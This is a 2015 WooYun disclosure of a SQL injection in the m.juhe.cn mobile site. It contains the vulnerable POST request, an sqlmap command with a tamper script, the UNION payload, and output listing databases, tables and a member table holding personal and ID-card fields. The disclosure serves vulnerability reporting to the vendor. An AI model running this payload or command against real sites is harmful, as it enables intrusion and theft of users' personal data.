当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089920

漏洞标题:聚合数据某系统SQL注射涉及大量信息

相关厂商:聚合数据

漏洞作者: 路人甲

提交时间:2015-01-04 15:30

修复时间:2015-02-18 15:32

公开时间:2015-02-18 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-04: 厂商已经确认,细节仅向厂商公开
2015-01-14: 细节向核心白帽子及相关领域专家公开
2015-01-24: 细节向普通白帽子公开
2015-02-03: 细节向实习白帽子公开
2015-02-18: 细节向公众公开

简要描述:

聚合数据某系统SQL注射涉及大量信息

详细说明:

站点:http://m.juhe.cn

POST /data/index HTTP/1.1
Host: m.juhe.cn
Accept: */*
Accept-Language: en
dataname=Peter+Winter&interface_btn=%0d


dataname字段未过滤

sqlmap.py -u "http://m.juhe.cn/data/index" --data="dataname=Peter+Winter&interface_btn=%0d" --tamper="tamper/charencode.py" --dbs


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: dataname (POST)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: dataname=Peter Winter') UNION ALL SELECT CONCAT
(0x7176767671,0x644e486e6c637559504b,0x71706b7671),NULL#&interface_btn=
---
web application technology: Apache
back-end DBMS: MySQL 5
current user:    'juheuser@%'
available databases [6]:
[*] information_schema
[*] mobile_juhe
[*] op.ofpay
[*] test
[*] ucenter
[*] weizhang_weiche


看一看mobile_juhe

Database: mobile_juhe
[58 tables]
+---------------------+
| adm_access_a        |
| adm_access_c        |
| adm_admin           |
| adm_group           |
| adm_group_access    |
| adm_logs            |
| chinajoy_awardlogs  |
| chinajoy_awards     |
| chinajoy_ips        |
| foreign_apis        |
| lottery_award_count |
| lottery_logs        |
| lottery_user_award  |
| lottery_user_count  |
| lottery_users_fanli |
| m_account           |
| m_account_pay_logs  |
| m_announcement      |
| m_apiaccount_logs   |
| m_apipay_logs       |
| m_banner            |
| m_bindmail_code     |
| m_category          |
| m_channel           |
| m_channel_report    |
| m_coins_activity    |
| m_coins_exchange    |
| m_data              |
| m_data_api          |
| m_data_delete_logs  |
| m_data_errcode      |
| m_data_package      |
| m_data_price        |
| m_intro_logs        |
| m_login_logs        |
| m_loginad           |
| m_loginerr          |
| m_member            |
| m_message           |
| m_mobilecode        |
| m_news              |
| m_news_category     |
| m_pay_logs          |
| m_paycoin_logs      |
| m_qa                |
| m_qa_answer         |
| m_qa_category       |
| m_qa_tags           |
| m_sq                |
| m_sq_logs           |
| m_user_api          |
| m_user_buylogs      |
| m_user_coin         |
| m_user_coin_logs    |
| m_user_forget       |
| m_user_newbuylogs   |
| m_user_regist_logs  |
| view_data           |
+---------------------+


瞧一瞧m_member,有9万多条数据

Table: m_member
[18 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| channel     | varchar(32)      |
| email       | varchar(128)     |
| id          | int(10) unsigned |
| lastlogin   | datetime         |
| mobileact   | tinyint(1)       |
| mobilephone | char(11)         |
| nickname    | varchar(64)      |
| openid      | char(34)         |
| realname    | varchar(64)      |
| regip       | varchar(16)      |
| regtime     | timestamp        |
| type        | int(1)           |
| uid         | varchar(64)      |
| vcard       | tinyint(1)       |
| vcardimg    | varchar(128)     |
| vcardno     | varchar(32)      |
| vcardtime   | datetime         |
| vcardtips   | varchar(64)      |
+-------------+------------------+


貌似有不少信息,就不再深入了。

漏洞证明:

见详细说明。

修复方案:

限制。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-04 15:33

厂商回复:

感谢

最新状态:

暂无